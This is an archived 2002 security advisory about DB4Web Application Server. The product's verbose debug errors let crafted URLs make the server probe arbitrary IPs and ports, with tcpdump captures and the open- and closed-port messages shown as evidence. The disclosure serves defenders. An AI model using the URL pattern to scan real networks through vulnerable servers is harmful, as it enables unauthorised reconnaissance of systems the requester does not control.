Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: General :: web5702.htm

DB4Web error reporting can be misused as a port scanner



19th Sep 2002 [SBWID-5702]
COMMAND

	DB4Web error reporting can be misused as a port scanner

SYSTEMS AFFECTED

	DB4Web Application Server

PROBLEM

	In  Guardeonic  Solutions  AG  [www.guardeonic.com]  security   advisory
	#02-2002 :
	

	The DB4Web (R) application can  be  misused  to  send  TCP  SYN  packets
	(initiate TCP connections) to arbitrary IP Adresses  and  TCP  Ports  by
	sending special http requests.
	

	Decription:
	

	A DB4Web (R) server accessed with a webbrowser  usually  requests  local
	or remote databases  to  generate  dynamic  html  pages.  By  requesting
	malicious URLs one can manipulate the server to query  an  arbitrary  IP
	with a freely definable port. The application will send TCP SYN  packets
	to  establish  a  connection.  The  error  messages  of  successful  and
	unsuccessful tcp connections are  different.  Thus  it  is  possible  to
	portscan/fingerprint IPs accessible for the DB4Web (R) server.
	 

	Example:
	

	The scenario was tested with a  system  running  SuSE  Linux  7.3  which
	includes a trial version of  DB4Web  (R)  and  a  linux  system  running
	tcpdump.
	

	On the DB4Web (R) server (172.31.93.158) the URL
	

	http://127.0.0.1/DB4Web/172.31.93.30:22/foo

	

	is requested by Mozilla (Webbrowser). 172.31.93.30  is  the  IP  of  the
	system running tcpdump with port 22 open  (sshd).  Tcpdump  reports  the
	3-way handshake and the reset due to wrong protocol used by  the  server
	(the listener runs sshd on port 22).
	

	Tcpdump's output looks:
	

	17:25:13.671550 172.31.93.158.1449 > 172.31.93.30.22: S

	266670866:266670866(0) win 5840 <mss 1460,sackOK,timestamp 1232639

	0,nop,wscale 0> (DF)

	17:25:13.671663 172.31.93.30.22 > 172.31.93.158.1449: S

	279647520:279647520(0) ack 266670867 win 5792 <mss 1460,sackOK,timestamp

	11683562 1232639,nop,wscale 0> (DF)

	17:25:13.674917 172.31.93.158.1449 > 172.31.93.30.22: . ack 1 win 5840

	<nop,nop,timestamp 1232639 11683562> (DF)

	17:25:13.678327 172.31.93.30.22 > 172.31.93.158.1449: P 1:23(22) ack 1

	win 5792 <nop,nop,timestamp 11683563 1232639> (DF)

	17:25:13.680997 172.31.93.158.1449 > 172.31.93.30.22: . ack 23 win 5840

	<nop,nop,timestamp 1232640 11683563> (DF)

	17:25:13.684046 172.31.93.158.1449 > 172.31.93.30.22: P 1:961(960) ack

	23 win 5840 <nop,nop,timestamp 1232640 11683563> (DF)

	17:25:13.686428 172.31.93.30.22 > 172.31.93.158.1449: . ack 961 win 8640

	<nop,nop,timestamp 11683564 1232640> (DF)

	17:25:13.688520 172.31.93.30.22 > 172.31.93.158.1449: P 23:42(19) ack

	961 win 8640 <nop,nop,timestamp 11683564 1232640> (DF)

	17:25:13.690469 172.31.93.30.22 > 172.31.93.158.1449: R 42:42(0) ack 961

	win 8640 <nop,nop,timestamp 11683564 1232640> (DF)

	

	The browser  shows  a  lot  of  debug  stuff  reported  by  DB4Web  (R),
	especially the line:
	

	connect() ok

	

	And a few lines later:
	

	callmethodbinary_2 failed

	

	An URL like
	

	http://127.0.0.1/DB4Web/172.31.93.30:555/foo

	

	requests TCP port 555 which is closed on the listening system.
	

	Tcpdump reports three connection attempts:

	17:38:59.965559 172.31.93.158.1451 > 172.31.93.30.555: S

	1127433463:1127433463(0) win 5840 <mss 1460,sackOK,timestamp 1314829

	0,nop,wscale 0> (DF)

	17:38:59.965654 172.31.93.30.555 > 172.31.93.158.1451: R 0:0(0) ack

	1127433464 win 0 (DF)

	17:39:00.991971 172.31.93.158.1452 > 172.31.93.30.555: S

	1127433466:1127433466(0) win 5840 <mss 1460,sackOK,timestamp 1314930

	0,nop,wscale 0> (DF)

	17:39:00.992066 172.31.93.30.555 > 172.31.93.158.1452: R 0:0(0) ack

	1127433467 win 0 (DF)

	17:39:02.012012 172.31.93.158.1453 > 172.31.93.30.555: S

	1127433469:1127433469(0) win 5840 <mss 1460,sackOK,timestamp 1315031

	0,nop,wscale 0> (DF)

	17:39:02.012107 172.31.93.30.555 > 172.31.93.158.1453: R 0:0(0) ack

	1127433470 win 0 (DF)

	

	The debug message is different now and contains:

	connect() failed: Connection refused

	

SOLUTION

	The DB4Web teams does not classify this behavior as a  security  related
	bug. They define the verbose debug messages  as  a  feature  useful  for
	developers.  The  DB4Web  teams  states,  that  it  is   the   customers
	responsibility to substitute the debug page with a custom error page.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH